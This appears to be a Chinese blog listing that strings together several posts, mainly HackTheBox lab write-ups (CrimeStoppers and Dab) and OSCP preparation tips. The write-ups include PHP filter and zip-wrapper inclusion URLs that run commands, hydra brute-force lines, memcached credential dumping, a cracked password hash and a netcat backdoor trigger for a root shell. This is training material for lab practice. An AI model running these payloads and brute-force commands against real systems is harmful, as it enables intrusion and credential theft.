上一篇

首先要感谢毛爷爷，当时宣传“妇女能顶半边天”。

前言

因为选修了“英语演讲的艺术”，所以写了一篇演讲稿，主题是“中国应该放开生育限制”

扫描

title: CrimeStoppers-PHP伪协议在文件包含中的妙用 categories:

• CTF tags:

• CTF

hackthebox是一个在线的渗透平台，废话不多说，现在来学习如何利用web常见漏洞——PHP文件包含。最后的提权方式涉及到了反汇编的内容。

扫描

Nmap显示只有一个Apache 服务器在默认端口上运行。

Dirbuster目录探测

测试Web服务器会显示相当多的PHP脚本，但是尝试访问大多数脚本会显示是空白页。这个暗示了文件是被其他脚本包含引用的。

用burp抓包，发现cookie参数为 admin=0

修改cookie admin=1，可以发现多出来list这个网页，获得文件上传后的地址。

PHP文件包含

很明显，op参数用于在当前工作目录中包含一个php文件。通过使用php过滤器将目标文件转换为base64，可以获得php文件的源代码。

http://10.10.10.80/?op=php://filter/convert.base64-encode/resource=index

这一请求将输出以base64格式编码的 index.php 的内容。这说明了两件事，1：本地文件包含漏洞验证了存在，2：可以使用php伪协议

PHP ZIP wrapper/二进制数据上传

再次使用op参数，可以使用 php wrappers 在ZIP压缩文件中包含一个文件。

http://10.10.10.80/?op=zip://uploads/<LAB IP>/FILENAME#writeup.php?cmd=id

这里的FILENAME是tip/zip文件的hash。

通过burp拦截tip提交请求，并输入zip文件的原始数据，可以利用上述技术实现远程代码执行。

在上面的例子中，隐藏名是 9dfc0e1200ee90d2a380c2fcd2ff036754be27b4

通过结合使用zip打包器，可以通过zip中包含的writeup.php文件执行命令。

http://10.10.10.80/？op=zip://uploads/10.10.14.4/9dfc0e1200ee90d2a380c2fcd2ff036754be27b4%23writeup&cmd=id

权限提升

浏览dom用户目录会发现安装了一个Thunderbird。只需复制文件并在本地加载Thunderbird中的配置文件，或运行strings global-messages-db.sqlite上运行字符串，将会提供一个提示，建议被识别为后门的Apache模块rkhunter。

火狐解密：https://github.com/unode/firefox_decrypt

通过使用上述工具，可以恢复dom的密码。因为默认情况下，Thunderbird没有设置主密码，所以恢复密码很简单。

运行netstat-lp命令可以显示ssh正在侦听ipv6。使用ifconfig或ip addr可以很容易地获得目标的ipv6地址。结合从Thunderbird获得的凭证，可以用dom作为用户，ssh直接连入。

提权

检查IDA中的mod_rootme.so文件，会发现一个DarkArmy函数。进一步检查发现，该函数使用十六进制字符串对文本“HackTheBox”进行了异或。

因为Hack the box （用XOR计算器进行异或计算）结果为 e140d383b0b0c271b01，我们发现了后门密码。

一旦获得了密码短语，利用后门就很简单了。只需运行命令nc 10.10.10.80 80 ，然后输入GET FunSociety，就会获得一个root shell。

参考资料

有趣的本地文件包含方式：

https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/

10.10.10.10

10.10.10.121

1
2
3
4
5
6
7
8
9
10
11

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

五步完成oscp的准备

一个三十天完成lab实验并通过oscp认证的黑客的自述

https://medium.com/bugbountywriteup/5-tips-for-oscp-prep-76001cdf4f4f

我通过oscp考试的经验

我获得了实验室的访问资格，和一本380页的电子书，以及许多小时的视频。

在看材料的时候，我运行了密集的扫描。

看完材料后，我现在有了一个完全进行扫描了的列表。我花费了几个星期来分析，最后一周 我做了一份198页的报告——主要是因为大量高清的截图和代码片段。

我的计划是，在扫描4个主机的同时，开始利用缓冲区漏洞，然后在4个主机中，找到一个最简单的主机并提权。

我提权了一个最简单的主机，然后在9小时内获取了两个中等难度的主机的用户。 我遇到了困难，不能提权两个主机的任何一个，也不能获取通过考试的分数。

被初次尝试打击到了，但是庆幸于严格挑选主机，我选择了第二次尝试并且把希望放在的不同的medium主机上!

我第二次尝试很顺利，然后我提权了两个medium主机。在这些主机之后，我已经有了足够的分数 通过考试。我选择放弃难度大的主机，去完成39页的考试报告。我最终在20小时之内完成考试并提交了报告。

1 htb lab和IppSec youtube视频

https://www.hackthebox.eu/

https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

以及htb上，类似与oscp的主机名单。

2 Georgia Weidman

https://nostarch.com/pentesting

https://www.cybrary.it/course/advanced-penetration-testing/

Georgia Weidman的书，可以当作PWK课程教程的替代品。她提供了免费的课程，并且手把手在书中指导网络安全。当你还没准备好时，强烈推荐本书作为PWK课程提纲进行复习。

3 dostackbufferoverflowgood

https://github.com/justinsteven/dostackbufferoverflowgood

缓冲区溢出学习

4 不同的社区

https://discordapp.com/invite/TN3jXaQ

https://discord.gg/2G2nap8

5 onetwopunch

https://github.com/superkojiman/onetwopunch 我将提供的一个小实用技巧是一个名为onetwopunch的便捷工具，它帮助在大型实验室网络中以极高的准确度完成了大量的普通扫描。

此工具使用unicornscan快速扫描主机上的每个TCP和UDP端口，然后将打开的端口传递给nmap，您可以使用该端口指定标志。 我用它来轻松准确地在实验室和考试网络上运行扫描。

参考资料：

• https://xz.aliyun.com/t/1587/
• https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob

• http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/

• Reverse shell cheat sheet
• Basic Linux Privilege Escalation
• Creating Metasploit Payloads
• OSCP Handy Tips and Tricks

scan

1
2
3
4
5
6
7
8
9
10
11
12

nmap -sV -p 21,22,80 10.10.10.86

Starting Nmap 7.60 ( https://nmap.org ) at 2018-12-18 15:10 +08
Nmap scan report for 10.10.10.86
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.10.3 (Ubuntu)
8080/tcp open  http    nginx 1.10.3 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

全端口检查

1
2
3
4

Discovered open port 8080/tcp on 10.10.10.86                                   
Discovered open port 21/tcp on 10.10.10.86                                     
Discovered open port 80/tcp on 10.10.10.86                                     
Discovered open port 22/tcp on 10.10.10.86    

没发现其他开放端口

port

22

用msf ssh用户枚举模块，检查存在的用户

info1: user.txt

1
2
3
4
5
6
7
8
9
10
11
12

root
bin
daemon
lp
sync
mail
news
uucp
games
ftp
nobody
backup

21

ftp 10.10.10.86

1
2
3
4
5
6
7
8
9
10
11
12
13
14

trying1:检查弱密码
hydra -l root -P /usr/share/wordlists/long-pass-rockyou.txt ftp://10.10.10.86

trying2:检查ftp服务版本漏洞
msfconsole
search type:auxiliary ftp

trying3:匿名用户登陆
ftp 10.10.10.86
anonymous

ftp获得了一个dab.jpg，貌似没什么用

hydra -l dab -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.86

ftp可读不可写。

80

根据数据包，可以用hydra爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

POST /login HTTP/1.1

Host: 10.10.10.86

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.86/login

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

username=000&password=999&submit=Login

1
2
3
4
5
6
7

hydra -L /usr/share/wordlists/linux-user.txt -P /usr/share/wordlists/370-pass.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

hydra -l dab -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

hydra -L rockyou.txt -P rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

sqlmap -r post.txt --dbs --level 5

没有任何关于web口令的进展。

目录扫描

gobuster扫描存在的目录有：

1
2

http://10.10.10.86/login
http://10.10.10.86:8080/socket

nginx 1.10.3漏洞

http://www.91ri.org/9064.html 解析漏洞

8080

1
2
3

http://10.10.10.86:8080
Internal Dev
Access denied: password authentication cookie not set 

1
2
3

 dirb http://10.10.10.86:8080/socket/
dirb http://10.10.10.86:8080/socket?
可能是wfuzz出参数，然后命令执行

trying:

利用info1的字典，用hydra得到了可登录的账号。

hydra -L user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.86 ftp

info2 : ftp账号

1
2
3
4
5
6

[21][ftp] host: 10.10.10.86   login: ftp   password: 123456
[21][ftp] host: 10.10.10.86   login: ftp   password: 12345678
[21][ftp] host: 10.10.10.86   login: ftp   password: pussy
[21][ftp] host: 10.10.10.86   login: ftp   password: 12345
[21][ftp] host: 10.10.10.86   login: ftp   password: password
[21][ftp] host: 10.10.10.86   login: ftp   password: 1234

writeup

通过暴力破解，得到admin/Password1，作为密码，进入80端口。

参考这篇文章，Cookie: password=secret，用插件cookie editor修改cookie.

通过验证进入页面后，发现一个tcp连接的php脚本

http://10.10.10.86:8080/socket?port=22&cmd=11

通过fuzz，获取开放的端口。

1

wfuzz -c --hc=500 -z range,1-65535 -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=11'

开放的端口除了已知的，还有11211，Memory cache service，内存缓存服务。

免费和开源，高性能，分布式内存对象缓存系统，本质上是通用的，但旨在通过减轻数据库负载来加速动态Web应用程序。

搜索“memcached cheat sheet(备忘单)”，得知服务的使用方式。

https://lzone.de/cheat-sheet/memcached

http://10.10.10.86:8080/socket?port=11211&cmd=stats+slabs

http://10.10.10.86:8080/socket?port=11211&cmd=get+users

获得了一系列数据，将这些数据保存为json.

1
2

jq . test.json | awk -F\" '{print $2}' > /root/Desktop/10.10.10.86/user.lst
jq . test.json | awk -F\" '{print $4}' > /root/Desktop/10.10.10.86/pass.lst

再次ssh扫描可用用户

1
2
3
4

msfconsole
use scanner/ssh/ssh_enumusers
set RHOSTS 10.10.10.86
set USER_FILE /root/Desktop/10.10.10.86/user.lst

genevieve 是有效用户名

jq . test.json | grep genevieve获得了加密的hashfc7992e8952a8ff5000cb7856d8586d2

在线解密结果：Princess1

ssh genevieve@10.10.10.86

总结

值得反思的是，关于弱密码，应该在vps上部署脚本，然后自动化探测。

这个靶机做不出来，很正常的。。。没见过的服务，入侵思路都找不到。

如何检查一张图片中是否有隐藏的信息

1
2
3
4

exiftool xx.jpg
strings xx.jpg|less
binwalk xx.jpg
xxd xx.jpg |less

这里的自动更新，并不是说人工智能时代可以不用写blog，都交给机器来写：）

git与blog

在上一小节的基础上（git本地新建目录，初始化，git基本操作），学习下git搭建静态blog。 jekyll是一个生成静态网页的工具，不需要数据库支持

参考：Git远程操作详解